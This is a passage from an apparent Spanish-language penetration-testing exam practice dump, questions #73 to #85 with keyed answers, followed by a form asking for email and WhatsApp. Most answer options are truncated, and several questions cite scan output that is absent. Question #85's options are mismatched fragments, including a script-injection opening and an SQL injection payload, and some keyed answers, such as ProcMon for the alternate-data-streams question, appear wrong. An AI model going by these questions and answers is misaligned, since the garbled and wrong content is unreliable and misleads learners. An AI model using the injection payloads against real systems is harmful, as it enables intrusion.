D. map ג€"O ג€"v ג€"p80 192
Ver respuesta
Respuesta correcta: C
Cuestionar #73
Una persona encargada de realizar pruebas de penetración obtuvo los siguientes resultados después de escanear un servidor web utilizando la utilidad dirb:¿Cuál de los siguientes elementos es MÁS probable que contenga información útil para la persona encargada de realizar pruebas de penetración?
A. index
B. sobre
C. información
D. inicio
Ver respuesta
Respuesta correcta: B
Cuestionar #74
Un probador de penetración está buscando una vulnerabilidad que permita a los atacantes abrir puertas a través de un servicio TCP especializado que se utiliza para un sistema de control de acceso físico. El servicio existe en más de 100 hosts diferentes, por lo que al evaluador le gustaría automatizar la evaluación. La identificación requiere que el evaluador de penetración:-Tenga una conexión TCP completa-Envíe una carga útil "hola"-Espere una respuesta-Envíe una cadena de caracteres de más de 16 bytes¿Cuál de los siguientes enfoques sería el MEJOR para lograr el objetivo?
A. jecutar nmap -Pn -sV --script vuln
B. mplear un escaneo simple OpenVAS contra el puerto TCP del host
C. rear un script en lenguaje Lua y utilizarlo con NSE
D. ealizar un escaneo con credenciales con Nessus
Ver respuesta
Respuesta correcta: C
Cuestionar #75
¿Cuál de los siguientes requisitos de PCI DSS forma parte del proceso de pruebas de penetración?
A. l probador de penetración debe tener certificaciones de ciberseguridad
B. a red debe estar segmentadA
C. Sólo deben probarse los sistemas orientados hacia el exterior
D. a evaluación debe realizarse en horario no laboral
Ver respuesta
Respuesta correcta: B
Cuestionar #76
¿Cuál de los siguientes protocolos o tecnologías protegería la confidencialidad en tránsito para el envío por correo electrónico del informe final de evaluación de la seguridad?
A. /MIME
B. TPS
C. NSSEC
D. S2
Ver respuesta
Respuesta correcta: A
Cuestionar #77
Un consultor acaba de realizar un escaneo SYN de todos los puertos abiertos en un host remoto y ahora necesita identificar remotamente el tipo de servicios que se están ejecutando en el host. Cuál de las siguientes es una herramienta de reconocimiento activo que sería MEJOR utilizar para realizar esta tarea?
A. cpdump
B. nort
C. map
D. etstat
E. uzzer
Ver respuesta
Respuesta correcta: C
Cuestionar #78
Un probador de penetración recibe los siguientes resultados de una exploración de Nmap: ¿Cuál de los siguientes sistemas operativos es MÁS probable que esté ejecutando el objetivo?
A. entOS
B. rch Linux
C. Servidor Windows
D. Ubuntu
Ver respuesta
Respuesta correcta: C
Cuestionar #79
Ejecución de un escáner de vulnerabilidades en un segmento de red híbrido que incluye servidores informáticos generales y sistemas de control industrial:
A. evelará vulnerabilidades en el protocolo Modbus
B. uede provocar fallos involuntarios en los sistemas de control
C. uede reducir la tasa de verdaderos positivos de los hallazgos
D. creará una condición de denegación de servicio en las redes IP
Ver respuesta
Respuesta correcta: B
Cuestionar #80
Un probador de penetración ha obtenido acceso shell a un host Windows y desea ejecutar un binario especialmente diseñado para su posterior ejecución utilizando la función de creación de llamada a proceso ymic.exe. Cuál de los siguientes mecanismos del sistema operativo o del sistema de archivos es MÁS probable que admita este objetivo?
A. lujos de datos alternativos
B. ódulos PowerShell
C. steganografía MP4
D. rocMon
Ver respuesta
Respuesta correcta: D
Cuestionar #81
El Director General de una empresa ha creado una oficina doméstica secundaria y le preocupa que el servicio WiFi que se utiliza sea vulnerable a un ataque. Se contrata a un especialista en pruebas de penetración para que compruebe la seguridad del router del servicio WiFi
A. PS
B. PA2-EAP
C. PA-TKIP
D. PA2-PSK
Ver respuesta
Respuesta correcta: A
Cuestionar #82
En un repositorio de archivos de red desprotegido, un probador de penetración descubre un archivo de texto que contiene nombres de usuario y contraseñas en texto claro y una hoja de cálculo que contiene datos de 50 empleados, incluidos nombres completos, funciones y números de serie. El probador se da cuenta de que algunas de las contraseñas del archivo de texto siguen el formato . ¿Cuál de las siguientes sería la mejor acción que podría emprender el probador con esta información?
A. rear un diccionario de contraseñas personalizado como preparación para la prueba de rociado de contraseñas
B. ecomendar el uso de un gestor de contraseñas/bóveda en lugar de archivos de texto para almacenar las contraseñas de forma segurA
C. ecomendar configurar reglas de complejidad de contraseñas en todos los sistemas y aplicaciones
D. Documentar el repositorio de archivos desprotegido como un hallazgo en el informe de pruebas de penetración
Ver respuesta
Respuesta correcta: D
Cuestionar #83
Un probador de penetración inicia sesión como usuario en el entorno de nube de una empresa.¿Cuál de los siguientes módulos de Pacu permitirá al probador determinar el nivel de acceso del usuario existente?
A. am_enum_permissions
B. am_prive_sc_scan
C. am_backdoor_assume_role
D. am_bruteforce_permissions
Ver respuesta
Respuesta correcta: A
Cuestionar #84
Un evaluador de penetración necesita realizar un análisis de vulnerabilidades en un servidor web. Cuál de las siguientes herramientas es MÁS probable que elija?
A. map
B. ikto
C. aín y Abel
D. thercap
Ver respuesta
Respuesta correcta: B
Cuestionar #85
Durante una prueba de penetración, los nombres de dominio, rangos de IP, hosts y aplicaciones se definen en el:
A. script>var adr = '
B.
C. var/www/html/index
D. UNION SELECT 1, BASE DE DATOS (), 3 --
Ver respuesta
Respuesta correcta: C

Ver respuestas después del envío

Envíe su correo electrónico y WhatsApp para obtener las respuestas a sus preguntas.

Nota: asegúrese de que su ID de correo electrónico y Whatsapp sean válidos para que pueda obtener los resultados correctos del examen.

Correo electrónico:
WhatsApp/número de teléfono: